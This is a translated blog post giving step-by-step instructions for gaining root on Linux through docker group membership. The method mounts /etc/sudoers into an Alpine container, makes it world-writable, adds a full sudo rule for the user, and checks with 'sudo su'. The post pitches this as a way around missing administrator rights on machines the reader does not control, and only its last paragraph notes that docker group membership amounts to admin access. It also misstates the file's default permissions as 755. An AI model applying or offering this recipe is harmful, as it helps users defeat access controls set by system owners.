You don't have administrator rights on local hardware? Do you have Linux and Docker? If the answer to the above questions is yes, in this article I will show you how to use Docker to modify the
sudoers file, thanks to which you will get administrator privileges.
This article was translated from Polish using Google Translate. The original post can be found on my blog at https://blog.budzynskimaciej.pl.
The method presented here requires that the restricted user has access to docker commands, i.e. the user belongs to the docker group. Docker configuration requires that the user belongs to this group. This method only works on Linux (tested on Ubuntu).
- Run alpine linux with the file
sudoersin the container:
docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
- Changing permissions to edit
chmod 777 sudoers vi sudoers
- Adding the required permissions to the user in the
ikey to add an entry):
# A tab is required between user and ALL (TAB once, not 4 spaces) user ALL=(ALL:ALL) ALL
- Exit save from vi:
- Re-changing the permissions of the
sudoersfile to the default values and exiting the container console:
chmod 755 sudoers exit
- Verifying changes to the
cat /etc/sudoers sudo su
This command allows you to get an alpine linux image and then fire the container from that image. The
-it parameter is responsible for launching interactive mode (keeps
STDIN open, even if it's not connected) and allocating a pseudo-TTY. The
-v parameter binds the host directory or file to the container volume. In this case, we bind the host file
/etc/sudoers to the
sudoers file in the root of our container. The
--rm parameter causes the created container to be deleted when exiting and exiting the shell. The
alpine /bin/sh fragment is responsible for selecting the image from which the container will be created (in this case, linux alpine) and launching the command (program)
/bin/sh, i.e. the system shell.
/etc/sudoers file is protected against editing by default. Due to alpine being a minimalistic linux distro it comes with the vi file editor by default.
sudoers file should be edited with
visudo, however alpine does not have this installed by default. In order to edit the file, give full permission to the file to the current user using the
chmod 777 sudoers command launched in the alpine container. Then you can open the
sudoers file using the vi editor with the command:
vi sudoers. To enter text in the vi editor, press the
i button on the keyboard.
The above entry allows you to add user permissions to execute all commands. The first field indicates the name of the user affected by the rule (
user). The first
ALL means that this rule applies to all hosts. The second
ALL means that user user can run commands as all users. The third
ALL means that user user can run commands as all groups. The fourth
ALL means that these rules apply to all commands (commands). Remember to keep the appropriate formatting in the file. In Ubuntu, between
ALL was a single tab spacing (not four spaces). Personally, I'm not sure if using a single space or 4 spaces won't break anything, so I kept the target formatting to be sure.
To exit the vi editor and save changes, press the
esc key on the keyboard, and then type
:wq. The commands after the colon are commands for vi.
w means that we want to save the changes made to the file and
q means close the file.
We change the permissions on the sudoers file to the default values before editing, and then exit the container shell with the
exit command. Upon departure, the alpine container will be removed. Only the downloaded image will remain on the disk.
In order to verify the accesses, we can use the command
cat /etc/sudoers to check if the entries were added correctly. We can also use the
sudo su command to check if we can execute commands as sudo.
As you can see, docker allows you to change user permissions and modify files that we do not have access to by default. The Docker group belongs to the administration groups, so that a user in this group who has access to execute docker commands has the option of any modification of files without the need to access administrator rights.